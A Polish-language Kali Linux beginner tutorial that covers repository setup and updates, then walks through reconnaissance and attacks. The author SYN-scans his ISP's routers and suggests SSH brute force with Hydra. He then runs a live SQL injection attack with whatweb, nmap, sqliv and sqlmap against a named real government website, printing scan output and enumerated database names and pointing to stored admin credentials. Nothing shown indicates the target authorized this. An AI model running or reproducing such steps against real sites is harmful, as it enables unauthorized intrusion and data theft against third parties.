Samouczek Kali Linux

Kali Linux Tutorial



Jeśli jesteś ekspertem lub przynajmniej znasz Linuksa, polecenia i środowisko, właśnie zainstalowałeś Kali Linux na swoim komputerze, chciałeś zostać Mistrzem Kali Linux lub Etycznym Hakerem, to jesteś we właściwym miejscu. W tym artykule omówię samouczek Kali Linux dla użytkowników Linuksa, którzy nie są jeszcze zaznajomieni z Kali i zacznę od podstawowych technik używanych do hakowania i testowania bezpieczeństwa podczas korzystania z Kali.

Czym jest Kali Linux?

Kali Linux, ( po raz pierwszy wydany 13 marca 2013 r. ), która była formalnie znana jako BackTrack, opracowana przez firmę zajmującą się bezpieczeństwem Offensive Security, jest dystrybucją kryminalistyczną i skoncentrowaną na bezpieczeństwie opartą na gałęzi testowej Debiana. Kali Linux został zaprojektowany z myślą o testach penetracyjnych, odzyskiwaniu danych i wykrywaniu zagrożeń. Projekt przeszedł na model kroczącego wydania na początku tego roku, aby zapewnić użytkownikom dystrybucji bardziej aktualne narzędzia bezpieczeństwa. Kali Linux jest i zawsze będzie darmowy. Zawiera ponad 600 narzędzi do testowania penetracji.







Dlaczego Kali Linux? Czy to jest odpowiednie dla Ciebie?

Kali Linux zyskał ostatnio dużą popularność. I jest za tym powód. Hakowanie powraca jako fajna rzecz do zrobienia w kulturze popularnej i można to w znacznym stopniu przypisać serialowi Mr. Robot. Popularność Mr. Robota pomogła Kali Linux w pozyskiwaniu nowych użytkowników. Ludzie, którzy prawie nie znają Linuksa lub czegokolwiek związanego z bezpieczeństwem komputera, próbują teraz używać Kali jako swojej głównej dystrybucji Linuksa.



Nasza najbardziej zaawansowana dystrybucja testów penetracyjnych w historii. – Programiści Kali Linux. (Jest napisane na głównej stronie Kali.org na samej górze strony.) Co otrzymujesz z tego oświadczenia? Czy zauważyłeś to: APTD (Zaawansowana dystrybucja testów penetracyjnych)? Nie ma tu dosłownie terminu hacking. Kali Linux jest taki sam jak inne dystrybucje Linuksa. Mówiąc najprościej, jest to dystrybucja Linuksa wypełniona narzędziami związanymi z bezpieczeństwem i skierowana do ekspertów ds. Bezpieczeństwa sieci i komputerów. Jednak korzystanie z Kali Linux koncentruje się tylko na bezpieczeństwie i kryminalistyce.



Dystrybucja Linuksa to nic innego jak pakiet zawierający jądro Linuksa, zestaw podstawowych narzędzi i aplikacji oraz niektóre ustawienia domyślne. Tak więc Kali Linux nie oferuje czegoś wyjątkowego w tym sensie, że większość dostarczonych narzędzi może być zainstalowana w dowolnej dystrybucji Linuksa.





Kali Linux jest specjalnie nastawiony na spełnienie wymagań profesjonalnych testów penetracyjnych i audytu bezpieczeństwa. Jest skierowany do określonego podzbioru użytkowników Linuksa. Pentesterzy, hakerzy itp. Nie jest to zalecana dystrybucja, jeśli oczekujesz Kali do ogólnego pulpitu Linux do programowania, projektowania stron internetowych, gier, biura itp. Kali może dać ci pewne wyzwania, nawet jeśli jesteś doświadczonym użytkownikiem Linuksa .

CO NALEŻY ZROBIĆ PO INSTALACJI KALI LINUX

Po zainstalowaniu Kali Linux możesz się zastanawiać, co dalej z tym zrobić, prawda?. Wszyscy borykają się z tym problemem, nie martw się.



KROK 1: KONFIGURACJA REPOZYTORIUM

Po pierwsze, możesz już o tym wiedzieć, ale ważne jest, aby poprawnie ustawić repozytorium. Jak powiedziałem, model kroczącego wydania Kali Linux ma na celu zapewnienie użytkownikom dystrybucji bardziej aktualnych narzędzi bezpieczeństwa. Ogólnie rzecz biorąc, jeśli masz świeżo zainstalowany Kali Linux, repozytorium odwołuje się do nośnika, którego używasz do instalacji. Aby to naprawić, musisz zmienić repozytorium na oficjalne repozytorium Kali Linux. Wymagany plik znajduje się pod /etc/apt/sources.list . Otwórz plik za pomocą edytora tekstu leafpad i zamień domyślne repozytorium na to oficjalne repozytorium Kali Rolling:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

KROK 2: AKTUALIZUJ I UAKTUALNIJ SWOJEGO KALI LINUX

Po tej aktualizacji i aktualizacji systemu zsynchronizuj Kali Linux z najnowszą wersją. W tym celu otwórz terminal i wpisz:

apt update -y && apt upgrade -y && apt dist-upgrade 

Polecenie apt update pobiera i pobiera pakiety, wyświetlając informacje z repozytoriów i aktualizując je, aby uzyskać informacje o najnowszych wersjach pakietów i ich zależnościach.

Polecenie apt upgrade pobiera i instaluje nowszą wersję pakietów zainstalowanych pakietów Kali Linux, o ile nie ma błędów dotyczących zależności.

Apt dist-upgrade zaktualizuje wszystkie pakiety do najnowszej dostępnej wersji bez względu na wszystko. A także instaluj i usuwaj zależności według potrzeb (oczywiście instaluj zależności, aby zadowolić pakiety, ale także usuwaj zależności, które zostały osierocone, jeśli zaktualizowany pakiet nie potrzebuje już zależności.

PODSTAWOWA KONCEPCJA TESTÓW PENETRACJI Z KALI LINUX

Po pomyślnym wykonaniu tych kroków są trzy główne rzeczy, które możesz zrobić z Kali Linux w oparciu o docelowy system, w tym:

  1. Hakowanie sieci bezprzewodowej – Wifi hacking, phishing, ARP Poisoning itp.
  2. Hakowanie aplikacji internetowych – SQL Injection, Cross-Site Request Forgery (CSRF), Web Phishing, itp.
  3. Hakowanie urządzenia – Wykorzystaj maszynę docelową, aby przejąć nad nią kontrolę.

Nie uwzględniam hakowania IoT, nie oznacza to, że Kali Linux nie ma możliwości do tego celu. Ale dosłownie może należeć również do hakowania urządzeń. Ponieważ urządzenie ma wygląd fizyczny i formę. W tym samouczku omówiłem podstawową wiedzę na ich temat. Ponieważ Kali Linux jest ogromny, nie mieści się w jednym artykule!

Musisz również znać cykl lub procedurę badania penetracyjnego. Oni są:

  1. Rekonesans – zbieranie informacji
  2. Łów
  3. Operacja
  4. Po eksploatacji

HAKOWANIE SIECI BEZPRZEWODOWEJ Z KALI LINUX

Jeśli chodzi o hakowanie sieci bezprzewodowej, ofiara może się różnić. Ponieważ sieci bezprzewodowe składają się z kilku elementów, takich jak ISP (dostawca usług internetowych), router i jego koledzy (modem, koncentrator, przełącznik itp.) oraz klienci (użytkownicy, telewizja przemysłowa, komputer zdalny itp.). Mają też wrażliwe możliwości.

Internet to duża i złożona agregacja sprzętu sieciowego, połączonego ze sobą bramami. Śledzenie trasy, którą podążają twoje pakiety, jest ważne, aby wiedzieć, w jaki sposób docierasz do określonej nazwy hosta lub docelowego adresu IP.

Kali Linux ma wbudowane narzędzie o nazwie Traceroute. Traceroute wykorzystuje czas życia protokołu IP i próbuje wywołać odpowiedź ICMP TIME_EXCEEDED z każdej bramy na ścieżce do jakiegoś hosta. Traceroute próbuje śledzić trasę, którą pakiet IP podążałby do jakiegoś hosta internetowego, uruchamiając pakiety sondujące z małym TTL (czas życia), a następnie nasłuchując, czy czas ICMP przekroczył odpowiedź z bramy. Podam ci przykład, jak śledzić router ISP używany do obsługi naszego połączenia za pomocą Traceroute.

1. Uznanie

Zbieranie informacji to najważniejszy początek, nie przegap tego kroku. Na tym etapie naszym celem jest zdobycie jak największej ilości przydatnych informacji, które moglibyśmy uzyskać, a następnie te informacje są wykorzystywane do dalszych kroków.

Najpierw otwórz terminal i wpisz to polecenie, aby rozpocząć śledzenie drogi do witryny, w tym przypadku ustawiam witrynę na google.com.

traceroute google.com 

Zrzut ekranu Traceroute

2. Skanowanie

Gdy uruchomimy polecenia, wyświetli listę, dokąd idzie nasz pakiet w kolejności. Jak widać powyżej, mam 3 przeskoki, z których jeden jest moim serwerem ISP. Pierwszy adres IP na liście to mój router, który działa jako brama. A kolejne dwie z nich należą do mojego ISP. Sprawdźmy teraz usługę, z której korzystają, używając Nmapa. Tak więc cele, które będziemy skanować, to: 10.152.192,1 oraz 10.13.223.102 . W terminalu uruchomiłem następujące polecenie:

nmap -v -sS [IP Target] -Pn 

Rozłóżmy argument polecenia:

-v = Włącz tryb oznajmiania

-sS = Użyj techniki skanowania TCP SYN

-Pn = Traktuj wszystkie hosty jako online — pomiń wykrywanie hostów

A oto wynik, który otrzymaliśmy.

nmap zrzut ekranu 2

Niestety wszystkie porty włączone 10.152.192,1 są filtrowane, co oznacza, że ​​wszystkie przychodzące połączenia TCP są blokowane przez IDS lub Firewall na tym IP. Teraz zróbmy kolejny skan do drugiego celu.

Zrzut ekranu nmap 1

3. Operacja

W tej procedurze nie zamierzam przeprowadzać prawdziwej eksploatacji, zamiast tego pokażę jak. Na podstawie powyższego wyniku skanowania Nmapa wiemy, że ten adres IP ma serwer SSH działający na porcie 22 i jest on otwarty. Jest otwarty na brutalną siłę, haha! Znaleźliśmy dziurę, ten serwer SSH jest możliwą dziurą, do której moglibyśmy spróbować uzyskać dostęp. Istnieje kilka narzędzi w Kali Linux, które obsługują ataki bruteforce lub słownikowe na protokół SSH. Najbardziej popularną i potężną jest Hydra.

Ok, to była podstawowa procedura przeprowadzająca test penetracji na docelowym serwerze, którym w naszym przykładzie jest mój serwer ISP.

HAKOWANIE APLIKACJI INTERNETOWYCH Z KALI LINUX

Właściwie, jeśli pasjonujesz się tym, możesz skonfigurować swoje środowisko hakerskie, instalując DWVA (Damn Vulnerable Web App) w swoim Kali Linux. Jest to aplikacja internetowa PHP/MySQL, która ma wiele luk. Jego głównym celem jest pomoc specjalistom ds. bezpieczeństwa w testowaniu ich umiejętności i narzędzi w środowisku prawnym oraz pomoc programistom internetowym w lepszym zrozumieniu procesów zabezpieczania aplikacji internetowych. Możesz uzyskać DWVA za darmo na Github tutaj: https://github.com/ethicalhack3r/DVWA.

Na razie pokażę Ci, jak zrobić hackowanie aplikacji internetowych na prawdziwej stronie. Ale obiecaj mi, że ogranicza się to tylko do celów edukacyjnych. Zasymulujemy prawdziwy atak na prawdziwą witrynę za pomocą wstrzykiwania SQL.

Warunek wstępny

Narzędzia objęte:

– Whatweb (preinstalowany)

– Nmap (preinstalowany)

– SQLiv (instaluj ręcznie)

– SQLMap (preinstalowany)

Potrzebujemy jeszcze jednego dodatkowego narzędzia, które jest dostępne na Github tutaj: https://github.com/Hadesy2k/sqliv, zainstaluj je najpierw w naszym Kali Linux. To narzędzie o nazwie SQLiv, które jest w stanie wykonać ukierunkowane skanowanie, zapewniając określoną domenę (z indeksowaniem). Wpisz w terminalu:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Cel: www.trenggalekkab.go.id

1. Uznanie

Zbierz jak najwięcej przydatnych informacji. Moglibyśmy otworzyć stronę internetową i wykryć, jaka aplikacja jest uruchomiona w tej witrynie. Najpierw sprawdźmy, jaki to rodzaj strony. Użyjemy do tego Whatweb.

whatweb www.trenggalekkab.go.id 

Jaki zrzut ekranu z sieci

Jak widać powyżej, cel znajduje się w Indonezji. To biega Apache v2.2.27 na swoim serwerze internetowym, a także ma PHP w wersji 5.4.31 , ma adres IP 103.247.21.142 . Dobrze, zanotuj to. Być może będziesz musiał odwiedzić jego stronę internetową, szukając utworzonego pliku lub strony, parametrów adresu URL, a nawet formularza logowania. Na razie potrzebujemy tego adresu IP do następnego kroku, czyli skanowania.

2. Skanowanie

Tak jak poprzednio, ponownie używamy Nmapa do skanowania portów i usług uruchomionych w systemie docelowym.

nmap -v -sS 103.247.21.142 

A oto wynik, który otrzymaliśmy:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Istnieje kilka otwartych portów, które obsługują każdą usługę w miejscu docelowym, ale ten, który wygląda na rzucający się w oczy, to usługa mysql na porcie 3306. Wskazuje się, że ta witryna używa mysql zarządzać swoimi informacjami w bazach danych. Następnie zastanawiam się, czy na tej stronie są jakieś luki SQL Injection. Tak więc ponownie skanuję witrynę za pomocą SQLiv, który właśnie zainstalowaliśmy. Wpisałem polecenie :

sqliv -t www.trenggalekkab.go.id 

Zrzut ekranu SQLHacking1

Na tej stronie znaleźliśmy 2 możliwe adresy URL podatne na ataki SQL. Zanotuj te adresy URL.

3. Operacja

Ok, mamy adresy URL podatne na SQL i gotowe do wykonania. W tym celu użyjemy SQLMap. Składnia to:

sqlmap [Vulnerable URL] --dbs 

Polecenie powinno wyglądać tak:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Argument –dbs służy do nakazania SQLMapowi uzyskania docelowych baz danych. Oto wynik, który otrzymaliśmy:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap znalazł 2 bazy danych, ale tylko jedną z nich, która zawiera wrażliwe dane, takie jak konto poświadczeń administratora. To jest na trengkab_trg. Po znalezieniu baz danych należy wykonać jeszcze jeden krok. Oznacza to znalezienie tabel i kolumn, a ostatnim krokiem jest zrzucenie danych. Nie pokażę Ci jak tutaj w tej sekcji, używając tego celu. Przynajmniej znasz podstawową ideę cyklu ataku i korzystania z niektórych narzędzi.

HAKOWANIE URZĄDZEŃ

W przyszłym artykule na tej stronie omówimy hakowanie urządzeń, bądź na bieżąco. Jako ostrzeżenie wstępne będziesz chciał upewnić się, że znasz trochę Pythona.